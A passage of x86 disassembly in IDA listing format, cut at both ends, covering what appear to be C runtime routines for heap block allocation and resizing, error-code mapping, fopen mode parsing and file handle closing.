loc_41253A: ; CODE XREF: sub_4124BE+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_41253A
mov edx, [ebp+var_4]
loc_412572: ; CODE XREF: sub_4124BE+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_4125AF
or [eax+4], edi
loc_4125AF: ; CODE XREF: sub_4124BE+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_4125BF: ; CODE XREF: sub_4124BE+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4124BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4125C4 proc near ; CODE XREF: sub_414F92+63�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_412766
test bl, 1
jnz loc_41275F
add ebx, ecx
cmp esi, ebx
jg loc_41275F
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_412639
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_412639: ; CODE XREF: sub_4125C4+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_412684
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_412665
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_412684
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_412684
; ---------------------------------------------------------------------------
loc_412665: ; CODE XREF: sub_4125C4+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_412684
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_412684: ; CODE XREF: sub_4125C4+7B�j
; sub_4125C4+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41274D
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_4126BE
push 3Fh
pop edi
loc_4126BE: ; CODE XREF: sub_4125C4+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41273B
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_412712
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41270A
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41270A: ; CODE XREF: sub_4125C4+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_412732
; ---------------------------------------------------------------------------
loc_412712: ; CODE XREF: sub_4125C4+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_412728
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_412728: ; CODE XREF: sub_4125C4+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_412732: ; CODE XREF: sub_4125C4+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_41273B: ; CODE XREF: sub_4125C4+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_412750
; ---------------------------------------------------------------------------
loc_41274D: ; CODE XREF: sub_4125C4+DE�j
mov edx, [ebp+arg_4]
loc_412750: ; CODE XREF: sub_4125C4+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41289B
; ---------------------------------------------------------------------------
loc_41275F: ; CODE XREF: sub_4125C4+50�j
; sub_4125C4+5A�j
xor eax, eax
jmp loc_41289E
; ---------------------------------------------------------------------------
loc_412766: ; CODE XREF: sub_4125C4+47�j
jge loc_41289B
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_412791
push 3Fh
pop esi
loc_412791: ; CODE XREF: sub_4125C4+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_41281B
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4127AA
push 3Fh
pop esi
loc_4127AA: ; CODE XREF: sub_4125C4+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4127F4
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_4127D5
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4127F1
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4127F1
; ---------------------------------------------------------------------------
loc_4127D5: ; CODE XREF: sub_4125C4+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4127F1
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4127F1: ; CODE XREF: sub_4125C4+208�j
; sub_4125C4+20F�j ...
mov ebx, [ebp+arg_4]
loc_4127F4: ; CODE XREF: sub_4125C4+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41281B
push 3Fh
pop esi
loc_41281B: ; CODE XREF: sub_4125C4+1D1�j
; sub_4125C4+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_412892
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_412869
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_412861
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_412861: ; CODE XREF: sub_4125C4+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_412889
; ---------------------------------------------------------------------------
loc_412869: ; CODE XREF: sub_4125C4+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41287F
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41287F: ; CODE XREF: sub_4125C4+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_412889: ; CODE XREF: sub_4125C4+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_412892: ; CODE XREF: sub_4125C4+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41289B: ; CODE XREF: sub_4125C4+196�j
; sub_4125C4:loc_412766�j
xor eax, eax
inc eax
loc_41289E: ; CODE XREF: sub_4125C4+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_4125C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4128A3 proc near ; CODE XREF: sub_40E6DD+17�p
; sub_410733+32�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_4C5B4C
mov edx, dword_4C5B50
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_4128E0
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4128ED
; ---------------------------------------------------------------------------
loc_4128E0: ; CODE XREF: sub_4128A3+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_4128ED: ; CODE XREF: sub_4128A3+3B�j
mov eax, dword_4C5B58
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_41290F
; ---------------------------------------------------------------------------
loc_4128FB: ; CODE XREF: sub_4128A3+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_412914
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_41290F: ; CODE XREF: sub_4128A3+56�j
mov [ebp+arg_0], ebx
jb short loc_4128FB
loc_412914: ; CODE XREF: sub_4128A3+64�j
cmp ebx, [ebp+var_4]
jnz short loc_41293D
mov ebx, edx
jmp short loc_41292E
; ---------------------------------------------------------------------------
loc_41291D: ; CODE XREF: sub_4128A3+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_412935
add ebx, 14h
loc_41292E: ; CODE XREF: sub_4128A3+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_41291D
loc_412935: ; CODE XREF: sub_4128A3+86�j
cmp ebx, eax
jz loc_4129D1
loc_41293D: ; CODE XREF: sub_4128A3+74�j
; sub_4128A3+170�j
mov dword_4C5B58, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_412964
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_41299A
loc_412964: ; CODE XREF: sub_4128A3+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_412997
loc_412980: ; CODE XREF: sub_4128A3+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_412980
loc_412997: ; CODE XREF: sub_4128A3+DB�j
mov edx, [ebp+var_4]
loc_41299A: ; CODE XREF: sub_4128A3+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_412A23
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_412A23
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_4128A3+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_4129D6
add ebx, 14h
mov [ebp+arg_0], ebx
loc_4129D1: ; CODE XREF: sub_4128A3+94�j
cmp ebx, [ebp+var_4]
jb short loc_4129C5
loc_4129D6: ; CODE XREF: sub_4128A3+126�j
cmp ebx, [ebp+var_4]
jnz short loc_412A01
mov ebx, edx
jmp short loc_4129E8
; ---------------------------------------------------------------------------
loc_4129DF: ; CODE XREF: sub_4128A3+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_4129EF
add ebx, 14h
loc_4129E8: ; CODE XREF: sub_4128A3+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4129DF
loc_4129EF: ; CODE XREF: sub_4128A3+140�j
cmp ebx, eax
jnz short loc_412A01
call sub_412407
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_412A19
loc_412A01: ; CODE XREF: sub_4128A3+136�j
; sub_4128A3+14E�j
push ebx
call sub_4124BE
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_41293D
loc_412A19: ; CODE XREF: sub_4128A3+15C�j
xor eax, eax
jmp loc_412B9A
; ---------------------------------------------------------------------------
loc_412A20: ; CODE XREF: sub_4128A3+182�j
shl ecx, 1
inc edi
loc_412A23: ; CODE XREF: sub_4128A3+111�j
; sub_4128A3+120�j
test ecx, ecx
jge short loc_412A20
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_412A44
push 3Fh
pop esi
loc_412A44: ; CODE XREF: sub_4128A3+19C�j
cmp esi, edi
jz loc_412B4D
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_412AB0
cmp edi, 20h
mov ebx, 80000000h
jge short loc_412A84
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_412AAD
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_412AB0
; ---------------------------------------------------------------------------
loc_412A84: ; CODE XREF: sub_4128A3+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_412AAD
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_412AB0
; ---------------------------------------------------------------------------
loc_412AAD: ; CODE XREF: sub_4128A3+1D5�j
; sub_4128A3+1FD�j
mov ebx, [ebp+arg_0]
loc_412AB0: ; CODE XREF: sub_4128A3+1AF�j
; sub_4128A3+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_412B59
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_412B4A
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_412B21
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_412B0F
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_412B0F: ; CODE XREF: sub_4128A3+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_412B4A
; ---------------------------------------------------------------------------
loc_412B21: ; CODE XREF: sub_4128A3+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_412B34
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_412B34: ; CODE XREF: sub_4128A3+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_412B4A: ; CODE XREF: sub_4128A3+247�j
; sub_4128A3+27C�j
mov ecx, [ebp+var_8]
loc_412B4D: ; CODE XREF: sub_4128A3+1A3�j
test ecx, ecx
jz short loc_412B5C
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_412B5C
; ---------------------------------------------------------------------------
loc_412B59: ; CODE XREF: sub_4128A3+223�j
mov ecx, [ebp+var_8]
loc_412B5C: ; CODE XREF: sub_4128A3+2AC�j
; sub_4128A3+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_412B92
cmp ebx, dword_4C5B48
jnz short loc_412B92
mov ecx, [ebp+var_4]
cmp ecx, dword_4C5B60
jnz short loc_412B92
and dword_4C5B48, 0
loc_412B92: ; CODE XREF: sub_4128A3+2D3�j
; sub_4128A3+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_412B9A: ; CODE XREF: sub_4128A3+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_4128A3 endp
; =============== S U B R O U T I N E =======================================
sub_412B9F proc near ; CODE XREF: sub_40E723+1F�p
; sub_410733+5D�p ...
arg_0 = dword ptr 4
mov eax, dword_4C5984
test eax, eax
jz short loc_412BB7
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_412BB7
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_412BB7: ; CODE XREF: sub_412B9F+7�j
; sub_412B9F+12�j
xor eax, eax
retn
sub_412B9F endp
; =============== S U B R O U T I N E =======================================
sub_412BBA proc near ; CODE XREF: sub_41050F+AE�p
; sub_412DF3+8E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4C5908, eax
xor ecx, ecx
loc_412BC5: ; CODE XREF: sub_412BBA+18�j
cmp eax, dword_421380[ecx*8]
jz short loc_412BE9
inc ecx
cmp ecx, 2Dh
jb short loc_412BC5
cmp eax, 13h
jb short loc_412BF6
cmp eax, 24h
ja short loc_412BF6
mov dword_4C5904, 0Dh
retn
; ---------------------------------------------------------------------------
loc_412BE9: ; CODE XREF: sub_412BBA+12�j
mov eax, dword_421384[ecx*8]
mov dword_4C5904, eax
retn
; ---------------------------------------------------------------------------
loc_412BF6: ; CODE XREF: sub_412BBA+1D�j
; sub_412BBA+22�j
cmp eax, 0BCh
jb short loc_412C0E
cmp eax, 0CAh
mov dword_4C5904, 8
jbe short locret_412C18
loc_412C0E: ; CODE XREF: sub_412BBA+41�j
mov dword_4C5904, 16h
locret_412C18: ; CODE XREF: sub_412BBA+52�j
retn
sub_412BBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412C19 proc near ; CODE XREF: sub_40E8BA+21�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword_4C5B10
push edi
mov edi, [ebp+arg_4]
mov al, [edi]
xor ebx, ebx
cmp al, 61h
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
jz short loc_412C52
cmp al, 72h
jz short loc_412C4B
cmp al, 77h
jnz loc_412D5E
mov ecx, 301h
jmp short loc_412C57
; ---------------------------------------------------------------------------
loc_412C4B: ; CODE XREF: sub_412C19+21�j
xor ecx, ecx
or esi, 1
jmp short loc_412C5A
; ---------------------------------------------------------------------------
loc_412C52: ; CODE XREF: sub_412C19+1D�j
mov ecx, 109h
loc_412C57: ; CODE XREF: sub_412C19+30�j
or esi, 2
loc_412C5A: ; CODE XREF: sub_412C19+37�j
xor edx, edx
inc edx
jmp loc_412D39
; ---------------------------------------------------------------------------
loc_412C62: ; CODE XREF: sub_412C19+125�j
cmp edx, ebx
jz loc_412D44
movsx eax, al
cmp eax, 54h
jg short loc_412CE3
jz short loc_412CD6
sub eax, 2Bh
jz short loc_412CC0
sub eax, 19h
jz short loc_412CB6
sub eax, 0Eh
jz short loc_412CA2
dec eax
jnz loc_412D1B
cmp [ebp+var_4], ebx
jnz loc_412D1B
mov [ebp+var_4], 1
or ecx, 20h
jmp loc_412D39
; ---------------------------------------------------------------------------
loc_412CA2: ; CODE XREF: sub_412C19+68�j
cmp [ebp+var_4], ebx
jnz short loc_412D1B
mov [ebp+var_4], 1
or ecx, 10h
jmp loc_412D39
; ---------------------------------------------------------------------------
loc_412CB6: ; CODE XREF: sub_412C19+63�j
test cl, 40h
jnz short loc_412D1B
or ecx, 40h
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412CC0: ; CODE XREF: sub_412C19+5E�j
test cl, 2
jnz short loc_412D1B
and ecx, 0FFFFFFFEh
and esi, 0FFFFFFFCh
or ecx, 2
or esi, 80h
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412CD6: ; CODE XREF: sub_412C19+59�j
mov eax, 1000h
test ecx, eax
jnz short loc_412D1B
or ecx, eax
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412CE3: ; CODE XREF: sub_412C19+57�j
sub eax, 62h
jz short loc_412D2E
dec eax
jz short loc_412D16
sub eax, 0Bh
jz short loc_412D02
sub eax, 6
jnz short loc_412D1B
test ch, 0C0h
jnz short loc_412D1B
or ecx, 4000h
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412D02: ; CODE XREF: sub_412C19+D5�j
cmp [ebp+var_8], ebx
jnz short loc_412D1B
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412D16: ; CODE XREF: sub_412C19+D0�j
cmp [ebp+var_8], ebx
jz short loc_412D1F
loc_412D1B: ; CODE XREF: sub_412C19+6B�j
; sub_412C19+74�j ...
xor edx, edx
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412D1F: ; CODE XREF: sub_412C19+100�j
mov [ebp+var_8], 1
or esi, 4000h
jmp short loc_412D39
; ---------------------------------------------------------------------------
loc_412D2E: ; CODE XREF: sub_412C19+CD�j
test ch, 0C0h
jnz short loc_412D1B
or ecx, 8000h
loc_412D39: ; CODE XREF: sub_412C19+44�j
; sub_412C19+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_412C62
loc_412D44: ; CODE XREF: sub_412C19+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_415B4C
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_412D62
loc_412D5E: ; CODE XREF: sub_412C19+25�j
xor eax, eax
jmp short loc_412D7C
; ---------------------------------------------------------------------------
loc_412D62: ; CODE XREF: sub_412C19+143�j
mov eax, [ebp+arg_C]
inc dword_4C5900
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_412D7C: ; CODE XREF: sub_412C19+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_412C19 endp
; =============== S U B R O U T I N E =======================================
sub_412D81 proc near ; CODE XREF: sub_40E8BA�p
push ebx
push esi
push edi
mov edi, dword_4C6EE0
xor ebx, ebx
xor esi, esi
xor eax, eax
cmp edi, ebx
jle short loc_412DED
mov ecx, dword_4C5ED4
loc_412D9A: ; CODE XREF: sub_412D81+29�j
mov edx, [ecx+eax*4]
cmp edx, ebx
jz short loc_412DB3
test byte ptr [edx+0Ch], 83h
jz short loc_412DAE
inc eax
cmp eax, edi
jl short loc_412D9A
jmp short loc_412DED
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D81+24�j
mov esi, [ecx+eax*4]
jmp short loc_412DD7
; ---------------------------------------------------------------------------
loc_412DB3: ; CODE XREF: sub_412D81+1E�j
mov edi, eax
push 20h
shl edi, 2
call sub_40E74F
pop ecx
mov ecx, dword_4C5ED4
mov [edi+ecx], eax
mov eax, dword_4C5ED4
mov edi, [edi+eax]
cmp edi, ebx
jz short loc_412DED
mov esi, edi
loc_412DD7: ; CODE XREF: sub_412D81+30�j
cmp esi, ebx
jz short loc_412DED
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebx
mov [esi+0Ch], ebx
mov [esi+8], ebx
mov [esi], ebx
mov [esi+1Ch], ebx
loc_412DED: ; CODE XREF: sub_412D81+11�j
; sub_412D81+2B�j ...
pop edi
mov eax, esi
pop esi
pop ebx
retn
sub_412D81 endp
; =============== S U B R O U T I N E =======================================
sub_412DF3 proc near ; CODE XREF: sub_40E8F7+2A�p
; sub_415B4C+2C5�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_4C5DA0
jnb loc_412E8D
mov eax, edi
sar eax, 5
mov esi, edi
and esi, 1Fh
lea ebx, ds:4C5DC0h[eax*4]
mov eax, [ebx]
shl esi, 3
test byte ptr [eax+esi+4], 1
jz short loc_412E8D
push edi
call sub_415FAA
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_412E6C
cmp edi, 1
jz short loc_412E3A
cmp edi, 2
jnz short loc_412E50
loc_412E3A: ; CODE XREF: sub_412DF3+40�j
push 2
call sub_415FAA
push 1
mov ebp, eax
call sub_415FAA
cmp eax, ebp
pop ecx
pop ecx
jz short loc_412E6C
loc_412E50: ; CODE XREF: sub_412DF3+45�j
push edi
call sub_415FAA
pop ecx
push eax
call dword_419064 ; CloseHandle
test eax, eax
jnz short loc_412E6C
call dword_4190AC ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_412E6E
; ---------------------------------------------------------------------------
loc_412E6C: ; CODE XREF: sub_412DF3+3B�j
; sub_412DF3+5B�j ...
xor ebp, ebp
loc_412E6E: ; CODE XREF: sub_412DF3+77�j
push edi
call sub_415F30
mov eax, [ebx]
and byte ptr [eax+esi+4], 0
test ebp, ebp
pop ecx
jz short loc_412E89
push ebp
call sub_412BBA
pop ecx
jmp short loc_412E9E
; ---------------------------------------------------------------------------
loc_412E89: ; CODE XREF: sub_412DF3+8B�j
xor eax, eax
jmp short loc_412EA1
; ---------------------------------------------------------------------------
loc_412E8D: ; CODE XREF: sub_412DF3+E�j
; sub_412DF3+2F�j
and dword_4C5908, 0
mov dword_4C5904, 9
loc_412E9E: ; CODE XREF: sub_412DF3+94�j
or eax, 0FFFFFFFFh
loc_412EA1: ; CODE XREF: sub_412DF3+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_412DF3 endp
; =============== S U B R O U T I N E =======================================
sub_412EA6 proc near ; CODE XREF: sub_40E8F7+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_412ECF
test al, 8
jz short loc_412ECF
push dword ptr [esi+8]
call sub_40E359
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_412ECF: ; CODE XREF: sub_412EA6+A�j
; sub_412EA6+E�j
pop esi
retn
sub_412EA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412ED1 proc near ; CODE XREF: sub_40EB9E+9E�p
; sub_411692+C8�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_41BCD8
call __SEH_prolog
xor ebx, ebx
cmp dword_4C598C, ebx
jnz short loc_412F1F
